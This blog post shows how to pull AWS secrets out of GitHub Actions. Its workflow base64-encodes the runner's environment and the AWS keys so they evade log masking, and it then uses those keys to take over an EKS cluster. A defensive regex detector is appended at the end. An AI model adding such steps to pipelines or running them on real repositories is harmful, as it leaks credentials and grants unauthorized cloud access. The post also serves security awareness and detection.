How to get your GitHub secrets from GitHub Actions

GitHub Secrets

GitHub Actions is an automation and continuous integration/continuous deployment (CI/CD) platform provided by GitHub. It allows you to automate various tasks and workflows within your GitHub repositories, such as building, testing, and deploying your code.

GitHub Actions allows you to store sensitive information, such as API keys or access tokens, as secrets. These secrets are encrypted and can be used within your workflows, allowing you to automate tasks that require sensitive information without compromising security.

While GitHub Secrets are secure from being exposed in plaintext within your code and logs, they are not foolproof against users with repository access because anyone with write access to the repository can potentially modify or misuse them. GitHub Secrets primarily protect against accidental exposure in public code repositories and are best suited for protecting sensitive information from unintentional leaks rather than malicious actions from users with repository access.

Accessing EKS using GitHub secrets

This post shows how to access the Amazon EKS service using GitHub secrets: how to create a GitHub action, retrieve environment variables, add new credentials, and finally access the EKS cluster using kubectl or Lens.

1. Take note of your GitHub Secrets

  • Access GitHub’s repository settings and locate the Secrets section.
  • Examine the names of your stored secrets for reference.

2. Create a GitHub action in the repository whose pipeline has Admin access.

name: test

on:
  workflow_dispatch:

jobs:
  deploy:
    runs-on: ubuntu-latest

    steps:

    # Print the runner's environment variables, base64-encoded
    - name: Get runner env variables
      run: env | base64

    # Print the two AWS secrets, base64-encoded
    - name: Get AWS secrets
      env:
        AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
      run: |
        echo "AWS_ACCESS_KEY_ID= $AWS_ACCESS_KEY_ID" | base64
        echo "AWS_SECRET_ACCESS_KEY= $AWS_SECRET_ACCESS_KEY" | base64

3. Run the action to get the environment variables from the runner

4. The output is base64-encoded, and you need to decode it to extract the variables.

5. Add new credentials

nano ~/.aws/credentials

[test]
aws_access_key_id = <aws_access_key_id>
aws_secret_access_key = <aws_secret_access_key>
region = <region>

export AWS_PROFILE=test

6. Check if you can access the EKS cluster

aws eks list-clusters

Output:
{
    "clusters": [
        "example1",
        "example2"
    ]
}

7. Check the AWS account

aws sts get-caller-identity

8. Get the kubeconfig file locally

aws eks update-kubeconfig --name example1

9. You can now take control of the EKS cluster

kubectl get pods -A
kubectl get all -n <name>
kubectl get deployment -n dev <name> -o yaml
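
Seen from the defender's side, the workflow in step 2 has a recognisable shape: a step that binds secrets to environment variables, or dumps the whole environment, and pipes the result through base64. The check below is an added example, not part of the original post; the function name find_secret_echo and the sample workflow are made up for illustration, and it only looks for the base64 pattern this post uses.

```python
import re

# Constructed sample: the steps of the workflow from step 2, plus one benign step.
SAMPLE_WORKFLOW = """\
steps:
- name: Get runner env variables
  run: env | base64
- name: Get AWS secrets
  env:
    AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
    AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
  run: |
    echo "AWS_ACCESS_KEY_ID= $AWS_ACCESS_KEY_ID" | base64
    echo "AWS_SECRET_ACCESS_KEY= $AWS_SECRET_ACCESS_KEY" | base64
- name: List clusters
  env:
    AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
  run: aws eks list-clusters
"""

STEP_START = re.compile(r"(?m)^\s*- (?=name:|run:|uses:)")
SECRET_ENV = re.compile(r"(?m)^\s*(\w+):\s*\$\{\{\s*secrets\.\w+\s*\}\}")
ENCODER = re.compile(r"\|\s*base64\b")  # only the encoder this post uses
ENV_DUMP = re.compile(r"(?:^|[\s:;&|])(?:env|printenv)\s*\|")

def find_secret_echo(workflow_text):
    """Return (step name, reason) for steps that encode secrets into the job log."""
    findings = []
    # Line-based scan, not a YAML parser: split the text into one chunk per step.
    for step in STEP_START.split(workflow_text)[1:]:
        name = re.search(r"name:\s*(.+)", step)
        label = name.group(1).strip() if name else "<unnamed>"
        # Env names in this step that are bound to ${{ secrets.* }}.
        var_refs = [re.compile(r"\$\{?" + re.escape(v) + r"\b") for v in SECRET_ENV.findall(step)]
        for line in step.splitlines():
            if not ENCODER.search(line):
                continue
            if ENV_DUMP.search(line):
                findings.append((label, "environment dump piped to encoder"))
            elif "secrets." in line or any(r.search(line) for r in var_refs):
                findings.append((label, "secret value piped to encoder"))
            else:
                continue
            break  # one finding per step is enough for review
    return findings

if __name__ == "__main__":
    for step_name, reason in find_secret_echo(SAMPLE_WORKFLOW):
        print(f"{step_name}: {reason}")
```

A check like this is a review aid for changes under .github/workflows. It does not replace limiting who has write access to the repository.
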
This post is licensed under CC BY 4.0 by the author.
